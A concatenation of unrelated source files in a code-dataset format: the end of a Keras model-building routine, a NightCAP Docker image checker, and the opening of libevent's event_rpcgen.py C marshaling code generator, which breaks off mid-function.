if task == 'classification':
loss_fn = SparseCategoricalCrossentropy()
metrics = ['accuracy']
elif task == 'regression':
loss_fn = MeanAbsoluteError()
metrics = ['mse']
output_dimension = 1
else:
raise ValueError('Argument "task" must be one of "classification" ' \
'or "regression"')
if model_type == 'lstm' or model_type == 'gru':
model = construct_rnn(input_dimension, output_dimension, model_type,
n_cells, dropout, hid_dimension, model_name)
elif model_type == 'lstm_cw' or model_type == 'gru_cw':
model = construct_channel_wise_rnn(input_dimension, output_dimension,
model_type, dropout, global_dropout, hid_dimension, multiplier,
model_name)
elif model_type == 'fcn':
model = construct_fcn(input_dimension, output_dimension, dropout,
model_name)
elif model_type == 'lstm_fcn':
model = construct_lstm_fcn(input_dimension, output_dimension, dropout,
hid_dimension, model_name)
else:
raise ValueError(f'Model type {model_type} is not supported.')
if checkpoint_file:
print(f"=> Loading weights from checkpoint: {checkpoint_file}")
model.load_weights(os.path.join(checkpoints_dir, checkpoint_file))
model.compile(optimizer=Adam(), loss=loss_fn, metrics=metrics)
model.summary()
return model
class MetricsCallback(Callback):
def __init__(self, model, task, training_data, validation_data,
training_steps, validation_steps):
"""Callback to compute metrics after an epoch has ended
Args:
model (tf.keras.model): TensorFlow (Keras) model
task (str): Classification or regression
training_data (tf.data.Dataset)
validation_data (tf.data.Dataset)
training_steps (int)
validation_steps (int)
"""
self.model = model
self.task = task
self.training_data = training_data
self.validation_data = validation_data
self.training_steps = training_steps
self.validation_steps = validation_steps
def on_epoch_end(self, epoch, logs=None):
"""The callback
Args:
epoch (int): Identifier of the current epoch
"""
print('\n=> Predict on training data:\n')
y_true, y_pred = [], []
for batch, (x, y) in enumerate(self.training_data):
if batch > self.training_steps:
break
if self.task == 'classification':
y_pred.append(np.argmax(self.model.predict_on_batch(x), axis=1))
else:
y_pred.append(self.model.predict_on_batch(x))
y_true.append(y.numpy())
if self.task == 'classification':
evaluate_classification_model(np.concatenate(y_true, axis=0),
np.concatenate(y_pred, axis=0))
else:
evaluate_regression_model(np.concatenate(y_true, axis=0),
np.concatenate(y_pred, axis=0))
print('\n=> Predict on validation data:\n')
y_true, y_pred = [], []
for batch, (x, y) in enumerate(self.validation_data):
if batch > self.validation_steps:
break
if self.task == 'classification':
y_pred.append(np.argmax(self.model.predict_on_batch(x), axis=1))
else:
y_pred.append(self.model.predict_on_batch(x))
y_true.append(y.numpy())
if self.task == 'classification':
evaluate_classification_model(np.concatenate(y_true, axis=0),
np.concatenate(y_pred, axis=0))
else:
evaluate_regression_model(np.concatenate(y_true, axis=0),
np.concatenate(y_pred, axis=0))
| 2.796875 | 3 |
nightcapcore/nightcapcore/docker/docker_checker.py | abaker2010/NightCAP | 2 | 12761540 | <filename>nightcapcore/nightcapcore/docker/docker_checker.py<gh_stars>1-10
# Copyright 2020 by <NAME>.
# All rights reserved.
# This file is part of the Nightcap Project,
# and is released under the "MIT License Agreement". Please see the LICENSE
# file that should have been included as part of this package.
# region Imports
import docker as dDocker
import os
from nightcapcore.printers.print import Printer
DEVNULL = open(os.devnull, "wb")
# endregion
class NightcapCoreDockerChecker(object):
"""
This class is used to help validate user input to the console
...
Attributes
----------
mongo_im_exists: -> bool
Checks to see if the mongo image exists
ncs_exits: -> bool
Checks to see if the nightcapsite image exists
Methods
-------
Accessible
-------
pull_image(self, image: str): -> None
pulls the docker image passed
None Accessible
-------
__check_image(self, image: str, tag: str, grep: str): -> bool
returns a boolean depending on if the image exists or not
_check_setup(self): -> bool
returns a boolean depending on if the image has been pulled from the Docker images
"""
# region Init
def __init__(self) -> None:
super().__init__()
self.printer = Printer()
self.docker = dDocker.from_env()
self.mongo_im_exists = self.__check_image("mongo", "latest", "mongo")
self.ncs_exits = self.__check_image("nightcapsite", "latest", "nightcapsite")
# endregion
# region Check Image
def __check_image(self, image: str, tag: str, grep: str):
try:
return self.docker.images.get(image + ":" + tag)
except Exception as e:
return False
# endregion
# region Check Set-up
def _check_setup(self):
if self.mongo_im_exists == False:
print("install mongo")
# endregion
# region Pull Image
def pull_image(self, image: str) -> None:
try:
self.docker.images.pull(image)
except Exception as e:
self.printer.print_error(Exception("Error pulling image: " + image))
raise e
# endregion
| 2.4375 | 2 |
event_rpcgen.py | mengzhisuoliu/libevent | 8,731 | 12761541 | #!/usr/bin/env python
#
# Copyright (c) 2005-2007 <NAME> <<EMAIL>>
# Copyright (c) 2007-2012 <NAME> and <NAME>
# All rights reserved.
#
# Generates marshaling code based on libevent.
# pylint: disable=too-many-lines
# pylint: disable=too-many-branches
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-statements
# pylint: disable=global-statement
# TODO:
# 1) propagate the arguments/options parsed by argparse down to the
# instantiated factory objects.
# 2) move the globals into a class that manages execution, including the
# progress outputs that go to stderr at the moment.
# 3) emit other languages.
import argparse
import re
import sys
_NAME = "event_rpcgen.py"
_VERSION = "0.1"
# Globals
LINE_COUNT = 0
CPPCOMMENT_RE = re.compile(r"\/\/.*$")
NONIDENT_RE = re.compile(r"\W")
PREPROCESSOR_DEF_RE = re.compile(r"^#define")
STRUCT_REF_RE = re.compile(r"^struct\[(?P<name>[a-zA-Z_][a-zA-Z0-9_]*)\]$")
STRUCT_DEF_RE = re.compile(r"^struct +[a-zA-Z_][a-zA-Z0-9_]* *{$")
WHITESPACE_RE = re.compile(r"\s+")
HEADER_DIRECT = []
CPP_DIRECT = []
QUIETLY = False
def declare(s):
if not QUIETLY:
print(s)
def TranslateList(mylist, mydict):
return [x % mydict for x in mylist]
class RpcGenError(Exception):
"""An Exception class for parse errors."""
def __init__(self, why): # pylint: disable=super-init-not-called
self.why = why
def __str__(self):
return str(self.why)
# Holds everything that makes a struct
class Struct(object):
def __init__(self, name):
self._name = name
self._entries = []
self._tags = {}
declare(" Created struct: %s" % name)
def AddEntry(self, entry):
if entry.Tag() in self._tags:
raise RpcGenError(
'Entry "%s" duplicates tag number %d from "%s" '
"around line %d"
% (entry.Name(), entry.Tag(), self._tags[entry.Tag()], LINE_COUNT)
)
self._entries.append(entry)
self._tags[entry.Tag()] = entry.Name()
declare(" Added entry: %s" % entry.Name())
def Name(self):
return self._name
def EntryTagName(self, entry):
"""Creates the name inside an enumeration for distinguishing data
types."""
name = "%s_%s" % (self._name, entry.Name())
return name.upper()
@staticmethod
def PrintIndented(filep, ident, code):
"""Takes an array, add indentation to each entry and prints it."""
for entry in code:
filep.write("%s%s\n" % (ident, entry))
class StructCCode(Struct):
""" Knows how to generate C code for a struct """
def __init__(self, name):
Struct.__init__(self, name)
def PrintTags(self, filep):
"""Prints the tag definitions for a structure."""
filep.write("/* Tag definition for %s */\n" % self._name)
filep.write("enum %s_ {\n" % self._name.lower())
for entry in self._entries:
filep.write(" %s=%d,\n" % (self.EntryTagName(entry), entry.Tag()))
filep.write(" %s_MAX_TAGS\n" % (self._name.upper()))
filep.write("};\n\n")
def PrintForwardDeclaration(self, filep):
filep.write("struct %s;\n" % self._name)
def PrintDeclaration(self, filep):
filep.write("/* Structure declaration for %s */\n" % self._name)
filep.write("struct %s_access_ {\n" % self._name)
for entry in self._entries:
dcl = entry.AssignDeclaration("(*%s_assign)" % entry.Name())
dcl.extend(entry.GetDeclaration("(*%s_get)" % entry.Name()))
if entry.Array():
dcl.extend(entry.AddDeclaration("(*%s_add)" % entry.Name()))
self.PrintIndented(filep, " ", dcl)
filep.write("};\n\n")
filep.write("struct %s {\n" % self._name)
filep.write(" struct %s_access_ *base;\n\n" % self._name)
for entry in self._entries:
dcl = entry.Declaration()
self.PrintIndented(filep, " ", dcl)
filep.write("\n")
for entry in self._entries:
filep.write(" ev_uint8_t %s_set;\n" % entry.Name())
filep.write("};\n\n")
filep.write(
"""struct %(name)s *%(name)s_new(void);
struct %(name)s *%(name)s_new_with_arg(void *);
void %(name)s_free(struct %(name)s *);
void %(name)s_clear(struct %(name)s *);
void %(name)s_marshal(struct evbuffer *, const struct %(name)s *);
int %(name)s_unmarshal(struct %(name)s *, struct evbuffer *);
int %(name)s_complete(struct %(name)s *);
void evtag_marshal_%(name)s(struct evbuffer *, ev_uint32_t,
const struct %(name)s *);
int evtag_unmarshal_%(name)s(struct evbuffer *, ev_uint32_t,
struct %(name)s *);\n"""
% {"name": self._name}
)
# Write a setting function of every variable
for entry in self._entries:
self.PrintIndented(
filep, "", entry.AssignDeclaration(entry.AssignFuncName())
)
self.PrintIndented(filep, "", entry.GetDeclaration(entry.GetFuncName()))
if entry.Array():
self.PrintIndented(filep, "", entry.AddDeclaration(entry.AddFuncName()))
filep.write("/* --- %s done --- */\n\n" % self._name)
def PrintCode(self, filep):
filep.write(
"""/*
* Implementation of %s
*/
"""
% (self._name)
)
filep.write(
"""
static struct %(name)s_access_ %(name)s_base__ = {
"""
% {"name": self._name}
)
for entry in self._entries:
self.PrintIndented(filep, " ", entry.CodeBase())
filep.write("};\n\n")
# Creation
filep.write(
"""struct %(name)s *
%(name)s_new(void)
{
return %(name)s_new_with_arg(NULL);
}
struct %(name)s *
%(name)s_new_with_arg(void *unused)
{
struct %(name)s *tmp;
if ((tmp = malloc(sizeof(struct %(name)s))) == NULL) {
event_warn("%%s: malloc", __func__);
return (NULL);
}
tmp->base = &%(name)s_base__;
"""
% {"name": self._name}
)
for entry in self._entries:
self.PrintIndented(filep, " ", entry.CodeInitialize("tmp"))
filep.write(" tmp->%s_set = 0;\n\n" % entry.Name())
filep.write(
""" return (tmp);
}
"""
)
# Adding
for entry in self._entries:
if entry.Array():
self.PrintIndented(filep, "", entry.CodeAdd())
filep.write("\n")
# Assigning
for entry in self._entries:
self.PrintIndented(filep, "", entry.CodeAssign())
filep.write("\n")
# Getting
for entry in self._entries:
self.PrintIndented(filep, "", entry.CodeGet())
filep.write("\n")
# Clearing
filep.write(
"""void
%(name)s_clear(struct %(name)s *tmp)
{
"""
% {"name": self._name}
)
for entry in self._entries:
self.PrintIndented(filep, " ", entry.CodeClear("tmp"))
filep.write("}\n\n")
# Freeing
filep.write(
"""void
%(name)s_free(struct %(name)s *tmp)
{
"""
% {"name": self._name}
)
for entry in self._entries:
self.PrintIndented(filep, " ", entry.CodeFree("tmp"))
filep.write(
""" free(tmp);
}
"""
)
# Marshaling
filep.write(
"""void
%(name)s_marshal(struct evbuffer *evbuf, const struct %(name)s *tmp) {
"""
% {"name": self._name}
)
for entry in self._entries:
indent = " "
# Optional entries do not have to be set
if entry.Optional():
indent += " "
filep.write(" if (tmp->%s_set) {\n" % entry.Name())
self.PrintIndented(
filep,
indent,
entry.CodeMarshal(
"evbuf",
self.EntryTagName(entry),
entry.GetVarName("tmp"),
entry.GetVarLen("tmp"),
),
)
if entry.Optional():
filep.write(" }\n")
filep.write("}\n\n")
# Unmarshaling
filep.write(
"""int
%(name)s_unmarshal(struct %(name)s *tmp, struct evbuffer *evbuf)
{
ev_uint32_t tag;
while (evbuffer_get_length(evbuf) > 0) {
if (evtag_peek(evbuf, &tag) == -1)
return (-1);
switch (tag) {
"""
% {"name": self._name}
)
for entry in self._entries:
filep.write(" case %s:\n" % (self.EntryTagName(entry)))
if not entry.Array():
filep.write(
""" if (tmp->%s_set)
return (-1);
"""
% (entry.Name())
)
self.PrintIndented(
filep,
" ",
entry.CodeUnmarshal(
"evbuf",
self.EntryTagName(entry),
entry.GetVarName("tmp"),
entry.GetVarLen("tmp"),
),
)
filep.write(
""" tmp->%s_set = 1;
break;
"""
% (entry.Name())
)
filep.write(
""" default:
return -1;
}
}
"""
)
# Check if it was decoded completely
filep.write(
""" if (%(name)s_complete(tmp) == -1)
return (-1);
return (0);
}
"""
% {"name": self._name}
)
# Checking if a structure has all the required data
filep.write(
"""
int
%(name)s_complete(struct %(name)s *msg)
{
"""
% {"name": self._name}
)
for entry in self._entries:
if not entry.Optional():
code = [
"""if (!msg->%(name)s_set)
return (-1);"""
]
code = TranslateList(code, entry.GetTranslation())
self.PrintIndented(filep, " ", code)
self.PrintIndented(
filep, " ", entry.CodeComplete("msg", entry.GetVarName("msg"))
)
filep.write(
""" return (0);
}
"""
)
# Complete message unmarshaling
filep.write(
"""
int
evtag_unmarshal_%(name)s(struct evbuffer *evbuf, ev_uint32_t need_tag,
struct %(name)s *msg)
{
ev_uint32_t tag;
int res = -1;
struct evbuffer *tmp = evbuffer_new();
if (evtag_unmarshal(evbuf, &tag, tmp) == -1 || tag != need_tag)
goto error;
if (%(name)s_unmarshal(msg, tmp) == -1)
goto error;
res = 0;
error:
evbuffer_free(tmp);
return (res);
}
"""
% {"name": self._name}
)
# Complete message marshaling
filep.write(
"""
void
evtag_marshal_%(name)s(struct evbuffer *evbuf, ev_uint32_t tag,
const struct %(name)s *msg)
{
struct evbuffer *buf_ = evbuffer_new();
assert(buf_ != NULL);
%(name)s_marshal(buf_, msg);
evtag_marshal_buffer(evbuf, tag, buf_);
evbuffer_free(buf_);
}
"""
% {"name": self._name}
)
class Entry(object):
def __init__(self, ent_type, name, tag):
self._type = ent_type
self._name = name
self._tag = int(tag)
self._ctype = ent_type
self._optional = False
self._can_be_array = False
self._array = False
self._line_count = -1
self._struct = None
self._refname = None
self._optpointer = True
self._optaddarg = True
@staticmethod
def GetInitializer():
raise NotImplementedError("Entry does not provide an initializer")
def SetStruct(self, struct):
self._struct = struct
def LineCount(self):
assert self._line_count != -1
return self._line_count
def SetLineCount(self, number):
self._line_count = number
def Array(self):
return self._array
def Optional(self):
return self._optional
def Tag(self):
return self._tag
def Name(self):
return self._name
def Type(self):
return self._type
def MakeArray(self):
self._array = True
def MakeOptional(self):
self._optional = True
def Verify(self):
if self.Array() and not self._can_be_array:
raise RpcGenError(
'Entry "%s" cannot be created as an array '
"around line %d" % (self._name, self.LineCount())
)
if not self._struct:
raise RpcGenError(
'Entry "%s" does not know which struct it belongs to '
"around line %d" % (self._name, self.LineCount())
)
if self._optional and self._array:
raise RpcGenError(
'Entry "%s" has illegal combination of optional and array '
"around line %d" % (self._name, self.LineCount())
)
def GetTranslation(self, extradict=None):
if extradict is None:
extradict = {}
mapping = {
"parent_name": self._struct.Name(),
"name": self._name,
"ctype": self._ctype,
"refname": self._refname,
"optpointer": self._optpointer and "*" or "",
"optreference": self._optpointer and "&" or "",
"optaddarg": self._optaddarg and ", const %s value" % self._ctype or "",
}
for (k, v) in list(extradict.items()):
mapping[k] = v
return mapping
def GetVarName(self, var):
return "%(var)s->%(name)s_data" % self.GetTranslation({"var": var})
def GetVarLen(self, _var):
return "sizeof(%s)" % self._ctype
def GetFuncName(self):
return "%s_%s_get" % (self._struct.Name(), self._name)
def GetDeclaration(self, funcname):
code = [
"int %s(struct %s *, %s *);" % (funcname, self._struct.Name(), self._ctype)
]
return code
def CodeGet(self):
code = """int
%(parent_name)s_%(name)s_get(struct %(parent_name)s *msg, %(ctype)s *value)
{
if (msg->%(name)s_set != 1)
return (-1);
*value = msg->%(name)s_data;
return (0);
}"""
code = code % self.GetTranslation()
return code.split("\n")
def AssignFuncName(self):
return "%s_%s_assign" % (self._struct.Name(), self._name)
def AddFuncName(self):
return "%s_%s_add" % (self._struct.Name(), self._name)
def AssignDeclaration(self, funcname):
code = [
"int %s(struct %s *, const %s);"
% (funcname, self._struct.Name(), self._ctype)
]
return code
def CodeAssign(self):
code = [
"int",
"%(parent_name)s_%(name)s_assign(struct %(parent_name)s *msg,"
" const %(ctype)s value)",
"{",
" msg->%(name)s_set = 1;",
" msg->%(name)s_data = value;",
" return (0);",
"}",
]
code = "\n".join(code)
code = code % self.GetTranslation()
return code.split("\n")
def CodeClear(self, structname):
code = ["%s->%s_set = 0;" % (structname, self.Name())]
return code
@staticmethod
def CodeComplete(_structname, _var_name):
return []
@staticmethod
def CodeFree(_name):
return []
def CodeBase(self):
code = ["%(parent_name)s_%(name)s_assign,", "%(parent_name)s_%(name)s_get,"]
if self.Array():
code.append("%(parent_name)s_%(name)s_add,")
code = "\n".join(code)
code = code % self.GetTranslation()
return code.split("\n")
class EntryBytes(Entry):
def __init__(self, ent_type, name, tag, length):
# Init base class
super(EntryBytes, self).__init__(ent_type, name, tag)
self._length = length
self._ctype = "ev_uint8_t"
@staticmethod
def GetInitializer():
return "NULL"
def GetVarLen(self, _var):
return "(%s)" % self._length
@staticmethod
def CodeArrayAdd(varname, _value):
# XXX: copy here
return ["%(varname)s = NULL;" % {"varname": varname}]
def GetDeclaration(self, funcname):
code = [
"int %s(struct %s *, %s **);" % (funcname, self._struct.Name(), self._ctype)
]
return code
def AssignDeclaration(self, funcname):
code = [
"int %s(struct %s *, const %s *);"
% (funcname, self._struct.Name(), self._ctype)
]
return code
def Declaration(self):
dcl = ["ev_uint8_t %s_data[%s];" % (self._name, self._length)]
return dcl
def CodeGet(self):
name = self._name
code = [
"int",
"%s_%s_get(struct %s *msg, %s **value)"
% (self._struct.Name(), name, self._struct.Name(), self._ctype),
"{",
" if (msg->%s_set != 1)" % name,
" return (-1);",
" *value = msg->%s_data;" % name,
" return (0);",
"}",
]
return code
def CodeAssign(self):
name = self._name
code = [
"int",
"%s_%s_assign(struct %s *msg, const %s *value)"
% (self._struct.Name(), name, self._struct.Name(), self._ctype),
"{",
" msg->%s_set = 1;" % name,
" memcpy(msg->%s_data, value, %s);" % (name, self._length),
" return (0);",
"}",
]
return code
def CodeUnmarshal(self, buf, tag_name, var_name, var_len):
code = [
"if (evtag_unmarshal_fixed(%(buf)s, %(tag)s, "
"%(var)s, %(varlen)s) == -1) {",
' event_warnx("%%s: failed to unmarshal %(name)s", __func__);',
" return (-1);",
"}",
]
return TranslateList(
code,
self.GetTranslation(
{"var": var_name, "varlen": var_len, "buf": buf, "tag": tag_name}
),
)
@staticmethod
def CodeMarshal(buf, tag_name, var_name, var_len):
code = ["evtag_marshal(%s, %s, %s, %s);" % (buf, tag_name, var_name, var_len)]
return code
def CodeClear(self, structname):
code = [
"%s->%s_set = 0;" % (structname, self.Name()),
"memset(%s->%s_data, 0, sizeof(%s->%s_data));"
% (structname, self._name, structname, self._name),
]
return code
def CodeInitialize(self, name):
code = [
"memset(%s->%s_data, 0, sizeof(%s->%s_data));"
% (name, self._name, name, self._name)
]
return code
def Verify(self):
if not self._length:
raise RpcGenError(
'Entry "%s" needs a length '
"around line %d" % (self._name, self.LineCount())
)
super(EntryBytes, self).Verify()
class EntryInt(Entry):
def __init__(self, ent_type, name, tag, bits=32):
# Init base class
super(EntryInt, self).__init__(ent_type, name, tag)
self._can_be_array = True
if bits == 32:
self._ctype = "ev_uint32_t"
self._marshal_type = "int"
if bits == 64:
self._ctype = "ev_uint64_t"
self._marshal_type = "int64"
@staticmethod
def GetInitializer():
return "0"
@staticmethod
def CodeArrayFree(_var):
return []
@staticmethod
def CodeArrayAssign(varname, srcvar):
return ["%(varname)s = %(srcvar)s;" % {"varname": varname, "srcvar": srcvar}]
@staticmethod
def CodeArrayAdd(varname, value):
"""Returns a new entry of this type."""
return ["%(varname)s = %(value)s;" % {"varname": varname, "value": value}]
def CodeUnmarshal(self, buf, tag_name, var_name, _var_len):
code = [
"if (evtag_unmarshal_%(ma)s(%(buf)s, %(tag)s, &%(var)s) == -1) {",
' event_warnx("%%s: failed to unmarshal %(name)s", __func__);',
" return (-1);",
"}",
]
code = "\n".join(code) % self.GetTranslation(
{"ma": self._marshal_type, "buf": buf, "tag": tag_name, "var": var_name}
)
return code.split("\n")
def CodeMarshal(self, buf, tag_name, var_name, _var_len):
code = [
"evtag_marshal_%s(%s, %s, %s);"
% (self._marshal_type, buf, tag_name, var_name)
]
return code
def Declaration(self):
dcl = ["%s %s_data;" % (self._ctype, self._name)]
return dcl
def CodeInitialize(self, name):
code = ["%s->%s_data = 0;" % (name, self._name)]
return code
class EntryString(Entry):
def __init__(self, ent_type, name, tag):
# Init base class
super(EntryString, self).__init__(ent_type, name, tag)
self._can_be_array = True
self._ctype = "char *"
@staticmethod
def GetInitializer():
return "NULL"
@staticmethod
def CodeArrayFree(varname):
code = ["if (%(var)s != NULL) free(%(var)s);"]
return TranslateList(code, {"var": varname})
@staticmethod
def CodeArrayAssign(varname, srcvar):
code = [
"if (%(var)s != NULL)",
" free(%(var)s);",
"%(var)s = strdup(%(srcvar)s);",
"if (%(var)s == NULL) {",
' event_warnx("%%s: strdup", __func__);',
" return (-1);",
"}",
]
return TranslateList(code, {"var": varname, "srcvar": srcvar})
@staticmethod
def CodeArrayAdd(varname, value):
code = [
"if (%(value)s != NULL) {",
" %(var)s = strdup(%(value)s);",
" if (%(var)s == NULL) {",
" goto error;",
" }",
"} else {",
" %(var)s = NULL;",
"}",
]
return TranslateList(code, {"var": varname, "value": value})
def GetVarLen(self, var):
return "strlen(%s)" % self.GetVarName(var)
@staticmethod
def CodeMakeInitalize(varname):
return "%(varname)s = NULL;" % {"varname": varname}
def CodeAssign(self):
code = """int
%(parent_name)s_%(name)s_assign(struct %(parent_name)s *msg,
const %(ctype)s value)
{
if (msg->%(name)s_data != NULL)
free(msg->%(name)s_data);
if ((msg->%(name)s_data = strdup(value)) == NULL)
return (-1);
msg->%(name)s_set = 1;
return (0);
}""" % (
self.GetTranslation()
)
return code.split("\n")
def CodeUnmarshal(self, buf, tag_name, var_name, _var_len):
code = [
"if (evtag_unmarshal_string(%(buf)s, %(tag)s, &%(var)s) == -1) {",
' event_warnx("%%s: failed to unmarshal %(name)s", __func__);',
" return (-1);",
"}",
]
code = "\n".join(code) % self.GetTranslation(
{"buf": buf, "tag": tag_name, "var": var_name}
)
return code.split("\n")
@staticmethod
def CodeMarshal(buf, tag_name, var_name, _var_len):
code = ["evtag_marshal_string(%s, %s, %s);" % (buf, tag_name, var_name)]
return code
def CodeClear(self, structname):
code = [
"if (%s->%s_set == 1) {" % (structname, self.Name()),
" free(%s->%s_data);" % (structname, self.Name()),
" %s->%s_data = NULL;" % (structname, self.Name()),
" %s->%s_set = 0;" % (structname, self.Name()),
"}",
]
return code
def CodeInitialize(self, name):
code = ["%s->%s_data = NULL;" % (name, self._name)]
return code
def CodeFree(self, name):
code = [
"if (%s->%s_data != NULL)" % (name, self._name),
" free (%s->%s_data);" % (name, self._name),
]
return code
def Declaration(self):
dcl = ["char *%s_data;" % self._name]
return dcl
class EntryStruct(Entry):
def __init__(self, ent_type, name, tag, refname):
# Init base class
super(EntryStruct, self).__init__(ent_type, name, tag)
self._optpointer = False
self._can_be_array = True
self._refname = refname
self._ctype = "struct %s*" % refname
self._optaddarg = False
def GetInitializer(self):
return "NULL"
def GetVarLen(self, _var):
return "-1"
def CodeArrayAdd(self, varname, _value):
code = [
"%(varname)s = %(refname)s_new();",
"if (%(varname)s == NULL)",
" goto error;",
]
return TranslateList(code, self.GetTranslation({"varname": varname}))
def CodeArrayFree(self, var):
code = ["%(refname)s_free(%(var)s);" % self.GetTranslation({"var": var})]
return code
def CodeArrayAssign(self, var, srcvar):
code = [
"int had_error = 0;",
"struct evbuffer *tmp = NULL;",
"%(refname)s_clear(%(var)s);",
"if ((tmp = evbuffer_new()) == NULL) {",
' event_warn("%%s: evbuffer_new()", __func__);',
" had_error = 1;",
" goto done;",
"}",
"%(refname)s_marshal(tmp, %(srcvar)s);",
"if (%(refname)s_unmarshal(%(var)s, tmp) == -1) {",
' event_warnx("%%s: %(refname)s_unmarshal", __func__);',
" had_error = 1;",
" goto done;",
"}",
"done:",
"if (tmp != NULL)",
" evbuffer_free(tmp);",
"if (had_error) {",
" %(refname)s_clear(%(var)s);",
" return (-1);",
"}",
]
return TranslateList(code, self.GetTranslation({"var": var, "srcvar": srcvar}))
def CodeGet(self):
name = self._name
code = [
"int",
"%s_%s_get(struct %s *msg, %s *value)"
% (self._struct.Name(), name, self._struct.Name(), self._ctype),
"{",
" if (msg->%s_set != 1) {" % name,
" msg->%s_data = %s_new();" % (name, self._refname),
" if (msg->%s_data == NULL)" % name,
" return (-1);",
" msg->%s_set = 1;" % name,
" }",
" *value = msg->%s_data;" % name,
" return (0);",
"}",
]
return code
def CodeAssign(self):
code = (
"""int
%(parent_name)s_%(name)s_assign(struct %(parent_name)s *msg,
const %(ctype)s value)
{
struct evbuffer *tmp = NULL;
if (msg->%(name)s_set) {
%(refname)s_clear(msg->%(name)s_data);
msg->%(name)s_set = 0;
} else {
msg->%(name)s_data = %(refname)s_new();
if (msg->%(name)s_data == NULL) {
event_warn("%%s: %(refname)s_new()", __func__);
goto error;
}
}
if ((tmp = evbuffer_new()) == NULL) {
event_warn("%%s: evbuffer_new()", __func__);
goto error;
}
%(refname)s_marshal(tmp, value);
if (%(refname)s_unmarshal(msg->%(name)s_data, tmp) == -1) {
event_warnx("%%s: %(refname)s_unmarshal", __func__);
goto error;
}
msg->%(name)s_set = 1;
evbuffer_free(tmp);
return (0);
error:
if (tmp != NULL)
evbuffer_free(tmp);
if (msg->%(name)s_data != NULL) {
%(refname)s_free(msg->%(name)s_data);
msg->%(name)s_data = NULL;
}
return (-1);
}"""
% self.GetTranslation()
)
return code.split("\n")
def CodeComplete(self, structname, var_name):
code = [
"if (%(structname)s->%(name)s_set && "
"%(refname)s_complete(%(var)s) == -1)",
" return (-1);",
]
return TranslateList(
code, self.GetTranslation({"structname": structname, "var": var_name})
)
def CodeUnmarshal(self, buf, tag_name, var_name, _var_len):
code = [
"%(var)s = %(refname)s_new();",
"if (%(var)s == NULL)",
" return (-1);",
"if (evtag_unmarshal_%(refname)s(%(buf)s, %(tag)s, ",
" %(var)s) == -1) {",
' event_warnx("%%s: failed to unmarshal %(name)s", __func__);',
" return (-1);",
"}",
]
code = "\n".join(code) % self.GetTranslation(
{"buf": buf, "tag": tag_name, "var": var_name}
)
return code.split("\n")
def CodeMarshal(self, buf, tag_name, var_name, _var_len):
code = [
"evtag_marshal_%s(%s, %s, %s);" % (self._refname, buf, tag_name, var_name)
]
return code
def CodeClear(self, structname):
code = [
"if (%s->%s_set == 1) {" % (structname, self.Name()),
" %s_free(%s->%s_data);" % (self._refname, structname, self.Name()),
" %s->%s_data = NULL;" % (structname, self.Name()),
" %s->%s_set = 0;" % (structname, self.Name()),
"}",
]
return code
def CodeInitialize(self, name):
code = ["%s->%s_data = NULL;" % (name, self._name)]
return code
def CodeFree(self, name):
code = [
"if (%s->%s_data != NULL)" % (name, self._name),
" %s_free(%s->%s_data);" % (self._refname, name, self._name),
]
return code
def Declaration(self):
dcl = ["%s %s_data;" % (self._ctype, self._name)]
return dcl
class EntryVarBytes(Entry):
def __init__(self, ent_type, name, tag):
# Init base class
super(EntryVarBytes, self).__init__(ent_type, name, tag)
self._ctype = "ev_uint8_t *"
@staticmethod
def GetInitializer():
return "NULL"
def GetVarLen(self, var):
return "%(var)s->%(name)s_length" % self.GetTranslation({"var": var})
@staticmethod
def CodeArrayAdd(varname, _value):
# xxx: copy
return ["%(varname)s = NULL;" % {"varname": varname}]
def GetDeclaration(self, funcname):
code = [
"int %s(struct %s *, %s *, ev_uint32_t *);"
% (funcname, self._struct.Name(), self._ctype)
]
return code
def AssignDeclaration(self, funcname):
code = [
"int %s(struct %s *, const %s, ev_uint32_t);"
% (funcname, self._struct.Name(), self._ctype)
]
return code
def CodeAssign(self):
name = self._name
code = [
"int",
"%s_%s_assign(struct %s *msg, "
"const %s value, ev_uint32_t len)"
% (self._struct.Name(), name, self._struct.Name(), self._ctype),
"{",
" if (msg->%s_data != NULL)" % name,
" free (msg->%s_data);" % name,
" msg->%s_data = malloc(len);" % name,
" if (msg->%s_data == NULL)" % name,
" return (-1);",
" msg->%s_set = 1;" % name,
" msg->%s_length = len;" % name,
" memcpy(msg->%s_data, value, len);" % name,
" return (0);",
"}",
]
return code
def CodeGet(self):
name = self._name
code = [
"int",
"%s_%s_get(struct %s *msg, %s *value, ev_uint32_t *plen)"
% (self._struct.Name(), name, self._struct.Name(), self._ctype),
"{",
" if (msg->%s_set != 1)" % name,
" return (-1);",
" *value = msg->%s_data;" % name,
" *plen = msg->%s_length;" % name,
" return (0);",
"}",
]
return code
def CodeUnmarshal(self, buf, tag_name, var_name, var_len):
code = [
"if (evtag_payload_length(%(buf)s, &%(varlen)s) == -1)",
" return (-1);",
# We do not want DoS opportunities
"if (%(varlen)s > evbuffer_get_length(%(buf)s))",
" return (-1);",
"if ((%(var)s = malloc(%(varlen)s)) == NULL)",
" return (-1);",
"if (evtag_unmarshal_fixed(%(buf)s, %(tag)s, %(var)s, "
"%(varlen)s) == -1) {",
' event_warnx("%%s: failed to unmarshal %(name)s", __func__);',
" return (-1);",
"}",
]
code = "\n".join(code) % self.GetTranslation(
{"buf": buf, "tag": tag_name, "var": var_name, "varlen": var_len}
)
return code.split("\n")
@staticmethod
def CodeMarshal(buf, tag_name, var_name, var_len):
code = ["evtag_marshal(%s, %s, %s, %s);" % (buf, tag_name, var_name, var_len)]
return code
def CodeClear(self, structname):
code = [
"if (%s->%s_set == 1) {" % (structname, self.Name()),
" free (%s->%s_data);" % (structname, self.Name()),
" %s->%s_data = NULL;" % (structname, self.Name()),
" %s->%s_length = 0;" % (structname, self.Name()),
" %s->%s_set = 0;" % (structname, self.Name()),
"}",
]
return code
def CodeInitialize(self, name):
code = [
"%s->%s_data = NULL;" % (name, self._name),
"%s->%s_length = 0;" % (name, self._name),
]
return code
def CodeFree(self, name):
code = [
"if (%s->%s_data != NULL)" % (name, self._name),
" free(%s->%s_data);" % (name, self._name),
]
return code
def Declaration(self):
dcl = [
"ev_uint8_t *%s_data;" % self._name,
"ev_uint32_t %s_length;" % self._name,
]
return dcl
class EntryArray(Entry):
_index = None
def __init__(self, entry):
# Init base class
super(EntryArray, self).__init__(entry._type, entry._name, entry._tag)
self._entry = entry
self._refname = entry._refname
self._ctype = self._entry._ctype
self._optional = True
self._optpointer = self._entry._optpointer
self._optaddarg = self._entry._optaddarg
# provide a new function for accessing the variable name
def GetVarName(var_name):
return "%(var)s->%(name)s_data[%(index)s]" % self._entry.GetTranslation(
